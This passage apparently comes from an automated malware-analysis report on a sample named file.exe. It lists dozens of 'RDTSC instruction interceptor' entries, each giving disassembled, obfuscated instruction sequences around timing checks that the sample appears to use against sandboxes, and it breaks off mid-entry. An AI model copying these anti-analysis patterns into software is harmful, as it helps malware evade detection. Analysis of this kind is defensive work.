Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC18A second address: CCC20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F11A0CA9297h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F11A0CA9293h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F11A0CA928Eh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jg 00007F11A0CA928Eh 0x00000027 pop eax 0x00000028 xor si, 286Dh 0x0000002d lea ebx, dword ptr [ebp+1244FDDEh] 0x00000033 jmp 00007F11A0CA928Fh 0x00000038 mov cl, 2Dh 0x0000003a push eax 0x0000003b je 00007F11A0CA9294h 0x00000041 push eax 0x00000042 push edx 0x00000043 jnp 00007F11A0CA9286h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC36B second address: CCC372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB5DE second address: CEB5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB5E6 second address: CEB61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C88Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11A0C2C891h 0x00000013 jmp 00007F11A0C2C890h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB61A second address: CEB624 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A0CA9286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB624 second address: CEB638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A0C2C88Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB766 second address: CEB782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0CA9298h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB782 second address: CEB793 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F11A0C2C886h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB793 second address: CEB7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A0CA928Dh 0x0000000c jl 00007F11A0CA9286h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEB7AD second address: CEB7B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A0C2C886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEBA51 second address: CEBA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEBDF0 second address: CEBE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C891h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC0EE second address: CEC104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jp 00007F11A0CA9288h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE13FA second address: CE13FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBCBEB second address: CBCC07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA9294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC6C3 second address: CEC6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F11A0C2C88Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC6D1 second address: CEC6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC6D9 second address: CEC6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC6DD second address: CEC703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA928Bh 0x00000007 jno 00007F11A0CA9286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jo 00007F11A0CA9296h 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F11A0CA9286h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECCE7 second address: CECCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F11A0C2C886h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECFE5 second address: CECFF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A0CA928Ch 0x00000008 jne 00007F11A0CA9286h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECFF7 second address: CECFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CED13D second address: CED147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CED426 second address: CED44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C890h 0x00000009 jmp 00007F11A0C2C891h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF13A6 second address: CF13B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007F11A11FDA66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF14E3 second address: CF152E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F11A0E03027h 0x00000010 mov eax, dword ptr [eax] 0x00000012 js 00007F11A0E0302Dh 0x00000018 pushad 0x00000019 jl 00007F11A0E03016h 0x0000001f jmp 00007F11A0E0301Fh 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF152E second address: CF1534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF303F second address: CF3068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11A0E0301Eh 0x00000008 jmp 00007F11A0E03021h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB5FE7 second address: CB5FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB5FEB second address: CB5FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F11A0E0301Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB5FFF second address: CB6020 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F11A11FDA74h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6020 second address: CB6025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6025 second address: CB6039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A11FDA70h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6039 second address: CB604F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F11A0E0301Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB604F second address: CB6053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6053 second address: CB6057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8542 second address: CF8555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA6Eh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8555 second address: CF855A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF889F second address: CF88B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a push esi 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F11A11FDA66h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8A38 second address: CF8A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8A46 second address: CF8A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8A62 second address: CF8A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03027h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF8A7D second address: CF8A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F11A11FDA68h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFAEB0 second address: CFAF27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F11A0E03026h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 jmp 00007F11A0E03027h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F11A0E03018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 clc 0x00000036 sub dword ptr [ebp+122D1801h], ecx 0x0000003c sbb esi, 24C7BCF8h 0x00000042 call 00007F11A0E03019h 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFAF27 second address: CFAF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFAF2B second address: CFAF60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F11A0E03020h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007F11A0E03025h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFAF60 second address: CFAF89 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11A11FDA6Ch 0x00000008 jc 00007F11A11FDA66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F11A11FDA75h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB35F second address: CFB363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB363 second address: CFB369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB4CE second address: CFB4E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A0E0301Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB4E4 second address: CFB4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB5B0 second address: CFB5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFB5B6 second address: CFB5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFBB26 second address: CFBB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F11A0E03016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFBB30 second address: CFBB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CFBDD9 second address: CFBDFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jng 00007F11A0E03016h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC04F second address: CFC087 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11A11FDA74h 0x00000008 jmp 00007F11A11FDA6Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edi, dword ptr [ebp+122D3789h] 0x00000018 mov edi, 0D0DF9D4h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F11A11FDA6Bh 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC558 second address: CFC5CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F11A0E0301Ah 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F11A0E03018h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F11A0E03018h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f or di, A054h 0x00000054 xchg eax, ebx 0x00000055 jg 00007F11A0E0301Eh 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC5CC second address: CFC5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F11A11FDA6Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE66E second address: CBE672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFFC3 second address: D0001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D1BDFh], ebx 0x0000000f push edx 0x00000010 or edi, dword ptr [ebp+122D3709h] 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D1821h], esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F11A11FDA68h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b jne 00007F11A11FDA6Ch 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0001A second address: D00020 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00020 second address: D00025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00025 second address: D0003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0E0301Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02452 second address: D024A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F11A11FDA6Ch 0x0000000e pop edx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F11A11FDA68h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1BE7h], esi 0x00000030 push 00000000h 0x00000032 adc esi, 55628D1Dh 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D27E7h], esi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D024A6 second address: D024AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03EA0 second address: D03EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05980 second address: D05984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04BBD second address: D04BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D056FC second address: D05707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05984 second address: D0599D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A11FDA75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04BC1 second address: D04BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05707 second address: D05717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F11A11FDA66h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0599D second address: D059CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A0E0301Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D38CDh] 0x00000011 push 00000000h 0x00000013 mov di, 6164h 0x00000017 push 00000000h 0x00000019 mov esi, edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F11A0E0301Ch 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05717 second address: D0571B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06D04 second address: D06D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08250 second address: D082F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A11FDA74h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F11A11FDA68h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1821h], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F11A11FDA68h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a push esi 0x0000004b mov dword ptr [ebp+122D326Eh], ecx 0x00000051 pop edi 0x00000052 push 00000000h 0x00000054 call 00007F11A11FDA6Ah 0x00000059 sub edi, 4E17FA29h 0x0000005f pop edi 0x00000060 xchg eax, esi 0x00000061 jne 00007F11A11FDA80h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D082F7 second address: D08301 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B39C second address: D0B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA77h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007F11A11FDA75h 0x00000011 pop ebx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F11A11FDA68h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F11A11FDA68h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebp 0x00000046 push ebp 